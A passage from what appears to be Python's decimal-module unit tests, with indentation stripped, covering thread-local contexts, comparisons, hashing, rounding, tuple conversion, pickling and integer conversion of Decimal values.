cls.assertRaises(DivisionByZero, c2.divide, d1, 0)
cls.assertTrue(c2.flags[DivisionByZero])
with localcontext() as c3:
cls.assertTrue(c3.flags[Inexact])
cls.assertTrue(c3.flags[DivisionByZero])
cls.assertRaises(InvalidOperation, c3.compare, d1, Decimal('sNaN'))
cls.assertTrue(c3.flags[InvalidOperation])
del c3
cls.assertFalse(c2.flags[InvalidOperation])
del c2
cls.assertEqual(test1, Decimal('0.333333333333333333333333'))
cls.assertEqual(test2, Decimal('0.333333333333333333333333'))
c1 = getcontext()
cls.assertTrue(c1.flags[Inexact])
for sig in Overflow, Underflow, DivisionByZero, InvalidOperation:
cls.assertFalse(c1.flags[sig])
def thfunc2(cls):
Decimal = cls.decimal.Decimal
InvalidOperation = cls.decimal.InvalidOperation
DivisionByZero = cls.decimal.DivisionByZero
Overflow = cls.decimal.Overflow
Underflow = cls.decimal.Underflow
Inexact = cls.decimal.Inexact
getcontext = cls.decimal.getcontext
localcontext = cls.decimal.localcontext
d1 = Decimal(1)
d3 = Decimal(3)
test1 = d1/d3
thiscontext = getcontext()
thiscontext.prec = 18
test2 = d1/d3
with localcontext() as c2:
cls.assertTrue(c2.flags[Inexact])
cls.assertRaises(Overflow, c2.multiply, Decimal('1e425000000'), 999)
cls.assertTrue(c2.flags[Overflow])
with localcontext(thiscontext) as c3:
cls.assertTrue(c3.flags[Inexact])
cls.assertFalse(c3.flags[Overflow])
c3.traps[Underflow] = True
cls.assertRaises(Underflow, c3.divide, Decimal('1e-425000000'), 999)
cls.assertTrue(c3.flags[Underflow])
del c3
cls.assertFalse(c2.flags[Underflow])
cls.assertFalse(c2.traps[Underflow])
del c2
cls.synchro.set()
cls.finish2.set()
cls.assertEqual(test1, Decimal('0.333333333333333333333333'))
cls.assertEqual(test2, Decimal('0.333333333333333333'))
cls.assertFalse(thiscontext.traps[Underflow])
cls.assertTrue(thiscontext.flags[Inexact])
for sig in Overflow, Underflow, DivisionByZero, InvalidOperation:
cls.assertFalse(thiscontext.flags[sig])
class ThreadingTest(unittest.TestCase):
'''Unit tests for thread local contexts in Decimal.'''
# Take care executing this test from IDLE, there's an issue in threading
# that hangs IDLE and I couldn't find it
def test_threading(self):
DefaultContext = self.decimal.DefaultContext
if self.decimal == C and not self.decimal.HAVE_THREADS:
self.skipTest("compiled without threading")
# Test the "threading isolation" of a Context. Also test changing
# the DefaultContext, which acts as a template for the thread-local
# contexts.
save_prec = DefaultContext.prec
save_emax = DefaultContext.Emax
save_emin = DefaultContext.Emin
DefaultContext.prec = 24
DefaultContext.Emax = 425000000
DefaultContext.Emin = -425000000
self.synchro = threading.Event()
self.finish1 = threading.Event()
self.finish2 = threading.Event()
th1 = threading.Thread(target=thfunc1, args=(self,))
th2 = threading.Thread(target=thfunc2, args=(self,))
th1.start()
th2.start()
self.finish1.wait()
self.finish2.wait()
for sig in Signals[self.decimal]:
self.assertFalse(DefaultContext.flags[sig])
th1.join()
th2.join()
DefaultContext.prec = save_prec
DefaultContext.Emax = save_emax
DefaultContext.Emin = save_emin
@unittest.skipUnless(threading, 'threading required')
class CThreadingTest(ThreadingTest):
decimal = C
@unittest.skipUnless(threading, 'threading required')
class PyThreadingTest(ThreadingTest):
decimal = P
class UsabilityTest(unittest.TestCase):
'''Unit tests for Usability cases of Decimal.'''
def test_comparison_operators(self):
Decimal = self.decimal.Decimal
da = Decimal('23.42')
db = Decimal('23.42')
dc = Decimal('45')
#two Decimals
self.assertGreater(dc, da)
self.assertGreaterEqual(dc, da)
self.assertLess(da, dc)
self.assertLessEqual(da, dc)
self.assertEqual(da, db)
self.assertNotEqual(da, dc)
self.assertLessEqual(da, db)
self.assertGreaterEqual(da, db)
#a Decimal and an int
self.assertGreater(dc, 23)
self.assertLess(23, dc)
self.assertEqual(dc, 45)
#a Decimal and uncomparable
self.assertNotEqual(da, 'ugly')
self.assertNotEqual(da, 32.7)
self.assertNotEqual(da, object())
self.assertNotEqual(da, object)
# sortable
a = list(map(Decimal, range(100)))
b = a[:]
random.shuffle(a)
a.sort()
self.assertEqual(a, b)
def test_decimal_float_comparison(self):
Decimal = self.decimal.Decimal
da = Decimal('0.25')
db = Decimal('3.0')
self.assertLess(da, 3.0)
self.assertLessEqual(da, 3.0)
self.assertGreater(db, 0.25)
self.assertGreaterEqual(db, 0.25)
self.assertNotEqual(da, 1.5)
self.assertEqual(da, 0.25)
self.assertGreater(3.0, da)
self.assertGreaterEqual(3.0, da)
self.assertLess(0.25, db)
self.assertLessEqual(0.25, db)
self.assertNotEqual(0.25, db)
self.assertEqual(3.0, db)
self.assertNotEqual(0.1, Decimal('0.1'))
def test_decimal_complex_comparison(self):
Decimal = self.decimal.Decimal
da = Decimal('0.25')
db = Decimal('3.0')
self.assertNotEqual(da, (1.5+0j))
self.assertNotEqual((1.5+0j), da)
self.assertEqual(da, (0.25+0j))
self.assertEqual((0.25+0j), da)
self.assertEqual((3.0+0j), db)
self.assertEqual(db, (3.0+0j))
self.assertNotEqual(db, (3.0+1j))
self.assertNotEqual((3.0+1j), db)
self.assertIs(db.__lt__(3.0+0j), NotImplemented)
self.assertIs(db.__le__(3.0+0j), NotImplemented)
self.assertIs(db.__gt__(3.0+0j), NotImplemented)
self.assertIs(db.__le__(3.0+0j), NotImplemented)
def test_decimal_fraction_comparison(self):
D = self.decimal.Decimal
F = fractions[self.decimal].Fraction
Context = self.decimal.Context
localcontext = self.decimal.localcontext
InvalidOperation = self.decimal.InvalidOperation
emax = C.MAX_EMAX if C else 999999999
emin = C.MIN_EMIN if C else -999999999
etiny = C.MIN_ETINY if C else -1999999997
c = Context(Emax=emax, Emin=emin)
with localcontext(c):
c.prec = emax
self.assertLess(D(0), F(1,9999999999999999999999999999999999999))
self.assertLess(F(-1,9999999999999999999999999999999999999), D(0))
self.assertLess(F(0,1), D("1e" + str(etiny)))
self.assertLess(D("-1e" + str(etiny)), F(0,1))
self.assertLess(F(0,9999999999999999999999999), D("1e" + str(etiny)))
self.assertLess(D("-1e" + str(etiny)), F(0,9999999999999999999999999))
self.assertEqual(D("0.1"), F(1,10))
self.assertEqual(F(1,10), D("0.1"))
c.prec = 300
self.assertNotEqual(D(1)/3, F(1,3))
self.assertNotEqual(F(1,3), D(1)/3)
self.assertLessEqual(F(120984237, 9999999999), D("9e" + str(emax)))
self.assertGreaterEqual(D("9e" + str(emax)), F(120984237, 9999999999))
self.assertGreater(D('inf'), F(99999999999,123))
self.assertGreater(D('inf'), F(-99999999999,123))
self.assertLess(D('-inf'), F(99999999999,123))
self.assertLess(D('-inf'), F(-99999999999,123))
self.assertRaises(InvalidOperation, D('nan').__gt__, F(-9,123))
self.assertIs(NotImplemented, F(-9,123).__lt__(D('nan')))
self.assertNotEqual(D('nan'), F(-9,123))
self.assertNotEqual(F(-9,123), D('nan'))
def test_copy_and_deepcopy_methods(self):
Decimal = self.decimal.Decimal
d = Decimal('43.24')
c = copy.copy(d)
self.assertEqual(id(c), id(d))
dc = copy.deepcopy(d)
self.assertEqual(id(dc), id(d))
def test_hash_method(self):
Decimal = self.decimal.Decimal
localcontext = self.decimal.localcontext
def hashit(d):
a = hash(d)
b = d.__hash__()
self.assertEqual(a, b)
return a
#just that it's hashable
hashit(Decimal(23))
hashit(Decimal('Infinity'))
hashit(Decimal('-Infinity'))
hashit(Decimal('nan123'))
hashit(Decimal('-NaN'))
test_values = [Decimal(sign*(2**m + n))
for m in [0, 14, 15, 16, 17, 30, 31,
32, 33, 61, 62, 63, 64, 65, 66]
for n in range(-10, 10)
for sign in [-1, 1]]
test_values.extend([
Decimal("-1"), # ==> -2
Decimal("-0"), # zeros
Decimal("0.00"),
Decimal("-0.000"),
Decimal("0E10"),
Decimal("-0E12"),
Decimal("10.0"), # negative exponent
Decimal("-23.00000"),
Decimal("1230E100"), # positive exponent
Decimal("-4.5678E50"),
# a value for which hash(n) != hash(n % (2**64-1))
# in Python pre-2.6
Decimal(2**64 + 2**32 - 1),
# selection of values which fail with the old (before
# version 2.6) long.__hash__
Decimal("1.634E100"),
Decimal("90.697E100"),
Decimal("188.83E100"),
Decimal("1652.9E100"),
Decimal("56531E100"),
])
# check that hash(d) == hash(int(d)) for integral values
for value in test_values:
self.assertEqual(hashit(value), hashit(int(value)))
#the same hash that to an int
self.assertEqual(hashit(Decimal(23)), hashit(23))
self.assertRaises(TypeError, hash, Decimal('sNaN'))
self.assertTrue(hashit(Decimal('Inf')))
self.assertTrue(hashit(Decimal('-Inf')))
# check that the hashes of a Decimal float match when they
# represent exactly the same values
test_strings = ['inf', '-Inf', '0.0', '-.0e1',
'34.0', '2.5', '112390.625', '-0.515625']
for s in test_strings:
f = float(s)
d = Decimal(s)
self.assertEqual(hashit(f), hashit(d))
with localcontext() as c:
# check that the value of the hash doesn't depend on the
# current context (issue #1757)
x = Decimal("123456789.1")
c.prec = 6
h1 = hashit(x)
c.prec = 10
h2 = hashit(x)
c.prec = 16
h3 = hashit(x)
self.assertEqual(h1, h2)
self.assertEqual(h1, h3)
c.prec = 10000
x = 1100 ** 1248
self.assertEqual(hashit(Decimal(x)), hashit(x))
def test_min_and_max_methods(self):
Decimal = self.decimal.Decimal
d1 = Decimal('15.32')
d2 = Decimal('28.5')
l1 = 15
l2 = 28
#between Decimals
self.assertIs(min(d1,d2), d1)
self.assertIs(min(d2,d1), d1)
self.assertIs(max(d1,d2), d2)
self.assertIs(max(d2,d1), d2)
#between Decimal and int
self.assertIs(min(d1,l2), d1)
self.assertIs(min(l2,d1), d1)
self.assertIs(max(l1,d2), d2)
self.assertIs(max(d2,l1), d2)
def test_as_nonzero(self):
Decimal = self.decimal.Decimal
#as false
self.assertFalse(Decimal(0))
#as true
self.assertTrue(Decimal('0.372'))
def test_tostring_methods(self):
#Test str and repr methods.
Decimal = self.decimal.Decimal
d = Decimal('15.32')
self.assertEqual(str(d), '15.32') # str
self.assertEqual(repr(d), "Decimal('15.32')") # repr
def test_tonum_methods(self):
#Test float and int methods.
Decimal = self.decimal.Decimal
d1 = Decimal('66')
d2 = Decimal('15.32')
#int
self.assertEqual(int(d1), 66)
self.assertEqual(int(d2), 15)
#float
self.assertEqual(float(d1), 66)
self.assertEqual(float(d2), 15.32)
#floor
test_pairs = [
('123.00', 123),
('3.2', 3),
('3.54', 3),
('3.899', 3),
('-2.3', -3),
('-11.0', -11),
('0.0', 0),
('-0E3', 0),
('89891211712379812736.1', 89891211712379812736),
]
for d, i in test_pairs:
self.assertEqual(math.floor(Decimal(d)), i)
self.assertRaises(ValueError, math.floor, Decimal('-NaN'))
self.assertRaises(ValueError, math.floor, Decimal('sNaN'))
self.assertRaises(ValueError, math.floor, Decimal('NaN123'))
self.assertRaises(OverflowError, math.floor, Decimal('Inf'))
self.assertRaises(OverflowError, math.floor, Decimal('-Inf'))
#ceiling
test_pairs = [
('123.00', 123),
('3.2', 4),
('3.54', 4),
('3.899', 4),
('-2.3', -2),
('-11.0', -11),
('0.0', 0),
('-0E3', 0),
('89891211712379812736.1', 89891211712379812737),
]
for d, i in test_pairs:
self.assertEqual(math.ceil(Decimal(d)), i)
self.assertRaises(ValueError, math.ceil, Decimal('-NaN'))
self.assertRaises(ValueError, math.ceil, Decimal('sNaN'))
self.assertRaises(ValueError, math.ceil, Decimal('NaN123'))
self.assertRaises(OverflowError, math.ceil, Decimal('Inf'))
self.assertRaises(OverflowError, math.ceil, Decimal('-Inf'))
#round, single argument
test_pairs = [
('123.00', 123),
('3.2', 3),
('3.54', 4),
('3.899', 4),
('-2.3', -2),
('-11.0', -11),
('0.0', 0),
('-0E3', 0),
('-3.5', -4),
('-2.5', -2),
('-1.5', -2),
('-0.5', 0),
('0.5', 0),
('1.5', 2),
('2.5', 2),
('3.5', 4),
]
for d, i in test_pairs:
self.assertEqual(round(Decimal(d)), i)
self.assertRaises(ValueError, round, Decimal('-NaN'))
self.assertRaises(ValueError, round, Decimal('sNaN'))
self.assertRaises(ValueError, round, Decimal('NaN123'))
self.assertRaises(OverflowError, round, Decimal('Inf'))
self.assertRaises(OverflowError, round, Decimal('-Inf'))
#round, two arguments; this is essentially equivalent
#to quantize, which is already extensively tested
test_triples = [
('123.456', -4, '0E+4'),
('123.456', -3, '0E+3'),
('123.456', -2, '1E+2'),
('123.456', -1, '1.2E+2'),
('123.456', 0, '123'),
('123.456', 1, '123.5'),
('123.456', 2, '123.46'),
('123.456', 3, '123.456'),
('123.456', 4, '123.4560'),
('123.455', 2, '123.46'),
('123.445', 2, '123.44'),
('Inf', 4, 'NaN'),
('-Inf', -23, 'NaN'),
('sNaN314', 3, 'NaN314'),
]
for d, n, r in test_triples:
self.assertEqual(str(round(Decimal(d), n)), r)
def test_nan_to_float(self):
# Test conversions of decimal NANs to float.
# See http://bugs.python.org/issue15544
Decimal = self.decimal.Decimal
for s in ('nan', 'nan1234', '-nan', '-nan2468'):
f = float(Decimal(s))
self.assertTrue(math.isnan(f))
sign = math.copysign(1.0, f)
self.assertEqual(sign, -1.0 if s.startswith('-') else 1.0)
def test_snan_to_float(self):
Decimal = self.decimal.Decimal
for s in ('snan', '-snan', 'snan1357', '-snan1234'):
d = Decimal(s)
self.assertRaises(ValueError, float, d)
def test_eval_round_trip(self):
Decimal = self.decimal.Decimal
#with zero
d = Decimal( (0, (0,), 0) )
self.assertEqual(d, eval(repr(d)))
#int
d = Decimal( (1, (4, 5), 0) )
self.assertEqual(d, eval(repr(d)))
#float
d = Decimal( (0, (4, 5, 3, 4), -2) )
self.assertEqual(d, eval(repr(d)))
#weird
d = Decimal( (1, (4, 3, 4, 9, 1, 3, 5, 3, 4), -25) )
self.assertEqual(d, eval(repr(d)))
def test_as_tuple(self):
Decimal = self.decimal.Decimal
#with zero
d = Decimal(0)
self.assertEqual(d.as_tuple(), (0, (0,), 0) )
#int
d = Decimal(-45)
self.assertEqual(d.as_tuple(), (1, (4, 5), 0) )
#complicated string
d = Decimal("-4.34913534E-17")
self.assertEqual(d.as_tuple(), (1, (4, 3, 4, 9, 1, 3, 5, 3, 4), -25) )
# The '0' coefficient is implementation specific to decimal.py.
# It has no meaning in the C-version and is ignored there.
d = Decimal("Infinity")
self.assertEqual(d.as_tuple(), (0, (0,), 'F') )
#leading zeros in coefficient should be stripped
d = Decimal( (0, (0, 0, 4, 0, 5, 3, 4), -2) )
self.assertEqual(d.as_tuple(), (0, (4, 0, 5, 3, 4), -2) )
d = Decimal( (1, (0, 0, 0), 37) )
self.assertEqual(d.as_tuple(), (1, (0,), 37))
d = Decimal( (1, (), 37) )
self.assertEqual(d.as_tuple(), (1, (0,), 37))
#leading zeros in NaN diagnostic info should be stripped
d = Decimal( (0, (0, 0, 4, 0, 5, 3, 4), 'n') )
self.assertEqual(d.as_tuple(), (0, (4, 0, 5, 3, 4), 'n') )
d = Decimal( (1, (0, 0, 0), 'N') )
self.assertEqual(d.as_tuple(), (1, (), 'N') )
d = Decimal( (1, (), 'n') )
self.assertEqual(d.as_tuple(), (1, (), 'n') )
# For infinities, decimal.py has always silently accepted any
# coefficient tuple.
d = Decimal( (0, (0,), 'F') )
self.assertEqual(d.as_tuple(), (0, (0,), 'F'))
d = Decimal( (0, (4, 5, 3, 4), 'F') )
self.assertEqual(d.as_tuple(), (0, (0,), 'F'))
d = Decimal( (1, (0, 2, 7, 1), 'F') )
self.assertEqual(d.as_tuple(), (1, (0,), 'F'))
def test_as_integer_ratio(self):
Decimal = self.decimal.Decimal
# exceptional cases
self.assertRaises(OverflowError,
Decimal.as_integer_ratio, Decimal('inf'))
self.assertRaises(OverflowError,
Decimal.as_integer_ratio, Decimal('-inf'))
self.assertRaises(ValueError,
Decimal.as_integer_ratio, Decimal('-nan'))
self.assertRaises(ValueError,
Decimal.as_integer_ratio, Decimal('snan123'))
for exp in range(-4, 2):
for coeff in range(1000):
for sign in '+', '-':
d = Decimal('%s%dE%d' % (sign, coeff, exp))
pq = d.as_integer_ratio()
p, q = pq
# check return type
self.assertIsInstance(pq, tuple)
self.assertIsInstance(p, int)
self.assertIsInstance(q, int)
# check normalization: q should be positive;
# p should be relatively prime to q.
self.assertGreater(q, 0)
self.assertEqual(math.gcd(p, q), 1)
# check that p/q actually gives the correct value
self.assertEqual(Decimal(p) / Decimal(q), d)
def test_subclassing(self):
# Different behaviours when subclassing Decimal
Decimal = self.decimal.Decimal
class MyDecimal(Decimal):
y = None
d1 = MyDecimal(1)
d2 = MyDecimal(2)
d = d1 + d2
self.assertIs(type(d), Decimal)
d = d1.max(d2)
self.assertIs(type(d), Decimal)
d = copy.copy(d1)
self.assertIs(type(d), MyDecimal)
self.assertEqual(d, d1)
d = copy.deepcopy(d1)
self.assertIs(type(d), MyDecimal)
self.assertEqual(d, d1)
# Decimal(Decimal)
d = Decimal('1.0')
x = Decimal(d)
self.assertIs(type(x), Decimal)
self.assertEqual(x, d)
# MyDecimal(Decimal)
m = MyDecimal(d)
self.assertIs(type(m), MyDecimal)
self.assertEqual(m, d)
self.assertIs(m.y, None)
# Decimal(MyDecimal)
x = Decimal(m)
self.assertIs(type(x), Decimal)
self.assertEqual(x, d)
# MyDecimal(MyDecimal)
m.y = 9
x = MyDecimal(m)
self.assertIs(type(x), MyDecimal)
self.assertEqual(x, d)
self.assertIs(x.y, None)
def test_implicit_context(self):
Decimal = self.decimal.Decimal
getcontext = self.decimal.getcontext
# Check results when context given implicitly. (Issue 2478)
c = getcontext()
self.assertEqual(str(Decimal(0).sqrt()),
str(c.sqrt(Decimal(0))))
def test_none_args(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
localcontext = self.decimal.localcontext
InvalidOperation = self.decimal.InvalidOperation
DivisionByZero = self.decimal.DivisionByZero
Overflow = self.decimal.Overflow
Underflow = self.decimal.Underflow
Subnormal = self.decimal.Subnormal
Inexact = self.decimal.Inexact
Rounded = self.decimal.Rounded
Clamped = self.decimal.Clamped
with localcontext(Context()) as c:
c.prec = 7
c.Emax = 999
c.Emin = -999
x = Decimal("111")
y = Decimal("1e9999")
z = Decimal("1e-9999")
##### Unary functions
c.clear_flags()
self.assertEqual(str(x.exp(context=None)), '1.609487E+48')
self.assertTrue(c.flags[Inexact])
self.assertTrue(c.flags[Rounded])
c.clear_flags()
self.assertRaises(Overflow, y.exp, context=None)
self.assertTrue(c.flags[Overflow])
self.assertIs(z.is_normal(context=None), False)
self.assertIs(z.is_subnormal(context=None), True)
c.clear_flags()
self.assertEqual(str(x.ln(context=None)), '4.709530')
self.assertTrue(c.flags[Inexact])
self.assertTrue(c.flags[Rounded])
c.clear_flags()
self.assertRaises(InvalidOperation, Decimal(-1).ln, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
self.assertEqual(str(x.log10(context=None)), '2.045323')
self.assertTrue(c.flags[Inexact])
self.assertTrue(c.flags[Rounded])
c.clear_flags()
self.assertRaises(InvalidOperation, Decimal(-1).log10, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
self.assertEqual(str(x.logb(context=None)), '2')
self.assertRaises(DivisionByZero, Decimal(0).logb, context=None)
self.assertTrue(c.flags[DivisionByZero])
c.clear_flags()
self.assertEqual(str(x.logical_invert(context=None)), '1111000')
self.assertRaises(InvalidOperation, y.logical_invert, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
self.assertEqual(str(y.next_minus(context=None)), '9.999999E+999')
self.assertRaises(InvalidOperation, Decimal('sNaN').next_minus, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
self.assertEqual(str(y.next_plus(context=None)), 'Infinity')
self.assertRaises(InvalidOperation, Decimal('sNaN').next_plus, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
self.assertEqual(str(z.normalize(context=None)), '0')
self.assertRaises(Overflow, y.normalize, context=None)
self.assertTrue(c.flags[Overflow])
self.assertEqual(str(z.number_class(context=None)), '+Subnormal')
c.clear_flags()
self.assertEqual(str(z.sqrt(context=None)), '0E-1005')
self.assertTrue(c.flags[Clamped])
self.assertTrue(c.flags[Inexact])
self.assertTrue(c.flags[Rounded])
self.assertTrue(c.flags[Subnormal])
self.assertTrue(c.flags[Underflow])
c.clear_flags()
self.assertRaises(Overflow, y.sqrt, context=None)
self.assertTrue(c.flags[Overflow])
c.capitals = 0
self.assertEqual(str(z.to_eng_string(context=None)), '1e-9999')
c.capitals = 1
##### Binary functions
c.clear_flags()
ans = str(x.compare(Decimal('Nan891287828'), context=None))
self.assertEqual(ans, 'NaN1287828')
self.assertRaises(InvalidOperation, x.compare, Decimal('sNaN'), context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.compare_signal(8224, context=None))
self.assertEqual(ans, '-1')
self.assertRaises(InvalidOperation, x.compare_signal, Decimal('NaN'), context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.logical_and(101, context=None))
self.assertEqual(ans, '101')
self.assertRaises(InvalidOperation, x.logical_and, 123, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.logical_or(101, context=None))
self.assertEqual(ans, '111')
self.assertRaises(InvalidOperation, x.logical_or, 123, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.logical_xor(101, context=None))
self.assertEqual(ans, '10')
self.assertRaises(InvalidOperation, x.logical_xor, 123, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.max(101, context=None))
self.assertEqual(ans, '111')
self.assertRaises(InvalidOperation, x.max, Decimal('sNaN'), context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.max_mag(101, context=None))
self.assertEqual(ans, '111')
self.assertRaises(InvalidOperation, x.max_mag, Decimal('sNaN'), context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.min(101, context=None))
self.assertEqual(ans, '101')
self.assertRaises(InvalidOperation, x.min, Decimal('sNaN'), context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.min_mag(101, context=None))
self.assertEqual(ans, '101')
self.assertRaises(InvalidOperation, x.min_mag, Decimal('sNaN'), context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.remainder_near(101, context=None))
self.assertEqual(ans, '10')
self.assertRaises(InvalidOperation, y.remainder_near, 101, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.rotate(2, context=None))
self.assertEqual(ans, '11100')
self.assertRaises(InvalidOperation, x.rotate, 101, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.scaleb(7, context=None))
self.assertEqual(ans, '1.11E+9')
self.assertRaises(InvalidOperation, x.scaleb, 10000, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.shift(2, context=None))
self.assertEqual(ans, '11100')
self.assertRaises(InvalidOperation, x.shift, 10000, context=None)
self.assertTrue(c.flags[InvalidOperation])
##### Ternary functions
c.clear_flags()
ans = str(x.fma(2, 3, context=None))
self.assertEqual(ans, '225')
self.assertRaises(Overflow, x.fma, Decimal('1e9999'), 3, context=None)
self.assertTrue(c.flags[Overflow])
##### Special cases
c.rounding = ROUND_HALF_EVEN
ans = str(Decimal('1.5').to_integral(rounding=None, context=None))
self.assertEqual(ans, '2')
c.rounding = ROUND_DOWN
ans = str(Decimal('1.5').to_integral(rounding=None, context=None))
self.assertEqual(ans, '1')
ans = str(Decimal('1.5').to_integral(rounding=ROUND_UP, context=None))
self.assertEqual(ans, '2')
c.clear_flags()
self.assertRaises(InvalidOperation, Decimal('sNaN').to_integral, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.rounding = ROUND_HALF_EVEN
ans = str(Decimal('1.5').to_integral_value(rounding=None, context=None))
self.assertEqual(ans, '2')
c.rounding = ROUND_DOWN
ans = str(Decimal('1.5').to_integral_value(rounding=None, context=None))
self.assertEqual(ans, '1')
ans = str(Decimal('1.5').to_integral_value(rounding=ROUND_UP, context=None))
self.assertEqual(ans, '2')
c.clear_flags()
self.assertRaises(InvalidOperation, Decimal('sNaN').to_integral_value, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.rounding = ROUND_HALF_EVEN
ans = str(Decimal('1.5').to_integral_exact(rounding=None, context=None))
self.assertEqual(ans, '2')
c.rounding = ROUND_DOWN
ans = str(Decimal('1.5').to_integral_exact(rounding=None, context=None))
self.assertEqual(ans, '1')
ans = str(Decimal('1.5').to_integral_exact(rounding=ROUND_UP, context=None))
self.assertEqual(ans, '2')
c.clear_flags()
self.assertRaises(InvalidOperation, Decimal('sNaN').to_integral_exact, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.rounding = ROUND_UP
ans = str(Decimal('1.50001').quantize(exp=Decimal('1e-3'), rounding=None, context=None))
self.assertEqual(ans, '1.501')
c.rounding = ROUND_DOWN
ans = str(Decimal('1.50001').quantize(exp=Decimal('1e-3'), rounding=None, context=None))
self.assertEqual(ans, '1.500')
ans = str(Decimal('1.50001').quantize(exp=Decimal('1e-3'), rounding=ROUND_UP, context=None))
self.assertEqual(ans, '1.501')
c.clear_flags()
self.assertRaises(InvalidOperation, y.quantize, Decimal('1e-10'), rounding=ROUND_UP, context=None)
self.assertTrue(c.flags[InvalidOperation])
with localcontext(Context()) as context:
context.prec = 7
context.Emax = 999
context.Emin = -999
with localcontext(ctx=None) as c:
self.assertEqual(c.prec, 7)
self.assertEqual(c.Emax, 999)
self.assertEqual(c.Emin, -999)
def test_conversions_from_int(self):
# Check that methods taking a second Decimal argument will
# always accept an integer in place of a Decimal.
Decimal = self.decimal.Decimal
self.assertEqual(Decimal(4).compare(3),
Decimal(4).compare(Decimal(3)))
self.assertEqual(Decimal(4).compare_signal(3),
Decimal(4).compare_signal(Decimal(3)))
self.assertEqual(Decimal(4).compare_total(3),
Decimal(4).compare_total(Decimal(3)))
self.assertEqual(Decimal(4).compare_total_mag(3),
Decimal(4).compare_total_mag(Decimal(3)))
self.assertEqual(Decimal(10101).logical_and(1001),
Decimal(10101).logical_and(Decimal(1001)))
self.assertEqual(Decimal(10101).logical_or(1001),
Decimal(10101).logical_or(Decimal(1001)))
self.assertEqual(Decimal(10101).logical_xor(1001),
Decimal(10101).logical_xor(Decimal(1001)))
self.assertEqual(Decimal(567).max(123),
Decimal(567).max(Decimal(123)))
self.assertEqual(Decimal(567).max_mag(123),
Decimal(567).max_mag(Decimal(123)))
self.assertEqual(Decimal(567).min(123),
Decimal(567).min(Decimal(123)))
self.assertEqual(Decimal(567).min_mag(123),
Decimal(567).min_mag(Decimal(123)))
self.assertEqual(Decimal(567).next_toward(123),
Decimal(567).next_toward(Decimal(123)))
self.assertEqual(Decimal(1234).quantize(100),
Decimal(1234).quantize(Decimal(100)))
self.assertEqual(Decimal(768).remainder_near(1234),
Decimal(768).remainder_near(Decimal(1234)))
self.assertEqual(Decimal(123).rotate(1),
Decimal(123).rotate(Decimal(1)))
self.assertEqual(Decimal(1234).same_quantum(1000),
Decimal(1234).same_quantum(Decimal(1000)))
self.assertEqual(Decimal('9.123').scaleb(-100),
Decimal('9.123').scaleb(Decimal(-100)))
self.assertEqual(Decimal(456).shift(-1),
Decimal(456).shift(Decimal(-1)))
self.assertEqual(Decimal(-12).fma(Decimal(45), 67),
Decimal(-12).fma(Decimal(45), Decimal(67)))
self.assertEqual(Decimal(-12).fma(45, 67),
Decimal(-12).fma(Decimal(45), Decimal(67)))
self.assertEqual(Decimal(-12).fma(45, Decimal(67)),
Decimal(-12).fma(Decimal(45), Decimal(67)))
class CUsabilityTest(UsabilityTest):
decimal = C
class PyUsabilityTest(UsabilityTest):
decimal = P
class PythonAPItests(unittest.TestCase):
def test_abc(self):
Decimal = self.decimal.Decimal
self.assertTrue(issubclass(Decimal, numbers.Number))
self.assertFalse(issubclass(Decimal, numbers.Real))
self.assertIsInstance(Decimal(0), numbers.Number)
self.assertNotIsInstance(Decimal(0), numbers.Real)
def test_pickle(self):
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
Decimal = self.decimal.Decimal
savedecimal = sys.modules['decimal']
# Round trip
sys.modules['decimal'] = self.decimal
d = Decimal('-3.141590000')
p = pickle.dumps(d, proto)
e = pickle.loads(p)
self.assertEqual(d, e)
if C:
# Test interchangeability
x = C.Decimal('-3.123e81723')
y = P.Decimal('-3.123e81723')
sys.modules['decimal'] = C
sx = pickle.dumps(x, proto)
sys.modules['decimal'] = P
r = pickle.loads(sx)
self.assertIsInstance(r, P.Decimal)
self.assertEqual(r, y)
sys.modules['decimal'] = P
sy = pickle.dumps(y, proto)
sys.modules['decimal'] = C
r = pickle.loads(sy)
self.assertIsInstance(r, C.Decimal)
self.assertEqual(r, x)
x = C.Decimal('-3.123e81723').as_tuple()
y = P.Decimal('-3.123e81723').as_tuple()
sys.modules['decimal'] = C
sx = pickle.dumps(x, proto)
sys.modules['decimal'] = P
r = pickle.loads(sx)
self.assertIsInstance(r, P.DecimalTuple)
self.assertEqual(r, y)
sys.modules['decimal'] = P
sy = pickle.dumps(y, proto)
sys.modules['decimal'] = C
r = pickle.loads(sy)
self.assertIsInstance(r, C.DecimalTuple)
self.assertEqual(r, x)
sys.modules['decimal'] = savedecimal
def test_int(self):
Decimal = self.decimal.Decimal
for x in range(-250, 250):
s = '%0.2f' % (x / 100.0)
# should work the same as for floats
self.assertEqual(int(Decimal(s)), int(float(s)))
# should work the same as to_integral in the ROUND_DOWN mode
d = Decimal(s)
r = d.to_integral(ROUND_DOWN)
self.assertEqual(Decimal(int(d)), r)
self.assertRaises(ValueError, int, Decimal('-nan'))
self.assertRaises(ValueError, int, Decimal('snan'))
self.assertRaises(OverflowError, int, Decimal('inf'))
self.assertRaises(OverflowError, int, Decimal('-inf'))
def test_trunc(self):
